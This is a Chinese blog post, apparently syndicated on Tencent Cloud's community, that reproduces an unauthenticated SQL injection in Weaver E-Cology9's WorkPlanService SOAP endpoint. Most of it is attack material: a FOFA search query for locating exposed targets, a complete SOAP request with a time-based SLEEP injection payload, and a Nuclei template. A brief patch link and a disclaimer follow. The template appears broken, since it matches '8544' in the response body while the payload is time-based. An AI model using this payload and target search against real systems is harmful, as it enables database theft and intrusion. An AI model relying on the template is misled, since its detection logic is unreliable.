前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【漏洞复现】泛微E-Cology9 WorkPlanService 前台SQL注入

【漏洞复现】泛微E-Cology9 WorkPlanService 前台SQL注入

作者头像
没事就要多学习
发布2024-08-11 08:39:49
1860
发布2024-08-11 08:39:49
举报
文章被收录于专栏:Cyber Security

0x00 漏洞描述

泛微E-Cology9 是泛微网络科技股份有限公司开发的一款高效、灵活、全面的企业信息化办公系统。 泛微E-Cology9 中的 /services/WorkPlanService 接口存在SQL注入漏洞,攻击者可构造SOAP 请求进行SQL注入,窃取或修改数据库敏感信息,进一步利用可能获取目标系统权限。

影响范围

泛微补丁包<10.65.0

0x01 测绘工具

fofa: app=“泛微-OA(e-cology)”

0x02 漏洞复现

代码语言:javascript
复制
POST /services/WorkPlanService HTTP/1.1
HOST: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Connection: close
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
    <soapenv:Header/>
      <soapenv:Body>
      <web:deleteWorkPlan>
         <!--type: string-->
         <web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>
         <!--type: int-->
         <web:in1>22</web:in1> 
      </web:deleteWorkPlan>
      </soapenv:Body>
</soapenv:Envelope>

0x03 Nuclei检测脚本

代码语言:javascript
复制
id: 泛微E-Cology9 WorkPlanService 前台SQL注入

info:
  name: 泛微E-Cology9 WorkPlanService 前台SQL注入
  author: admin
  severity: high
  description: This template detects SQL Injection vulnerabilities in SOAP-based web services.

requests:
  - raw:
      - |
        POST /services/WorkPlanService HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
        Content-Type: text/xml;charset=UTF-8
        Connection: close

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
            <soapenv:Header/>
            <soapenv:Body>
                <web:deleteWorkPlan>
                    <web:in0>{{Payload}}</web:in0>
                    <web:in1>22</web:in1>
                </web:deleteWorkPlan>
            </soapenv:Body>
        </soapenv:Envelope>
    payloads:
      - name: Payload
        values:
          - "(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)"
    matchers:
      - type: word
        words:
          - "8544"
        part: body
    matchers-condition: and

0x04 修复建议

官方已发布升级补丁包,支持在线升级和离线补丁安装 https://www.weaver.com.cn/cs/securityDownload.html

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。 请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。 作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-07-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 漏洞描述
    • 影响范围
    • 0x01 测绘工具
    • 0x02 漏洞复现
    • 0x03 Nuclei检测脚本
    • 0x04 修复建议
    • 0x05 免责声明
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档